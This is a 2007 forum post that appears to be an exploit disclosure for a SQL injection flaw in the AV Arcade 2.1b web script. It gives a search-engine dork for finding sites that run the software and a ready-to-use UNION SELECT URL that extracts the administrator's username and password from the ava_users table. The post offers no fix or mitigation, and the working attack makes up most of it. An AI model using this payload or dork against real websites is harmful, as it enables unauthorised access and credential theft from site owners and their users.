kw3rln Posted July 1, 2007 Report Posted July 1, 2007 AV Arcade 2.1b (view_page.php) Remote SQL InjectionWeb: AV Arcade 2.1bSite : www.avscripts.netDork : "Powered By AV Arcade"Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET Description: SQL injection in $id of includes/view_page.phpExploit:index.php?task=view_page&id=-1%20UNION%20SELECT%201,username,password,4,5,6,7,8,9,10,11,12,13%20FROM%20ava_users%20WHERE%20id=1GREETZ: all memberz of RST and milw0rm//kw3rln [ http://rstzone.net ][EOF] Quote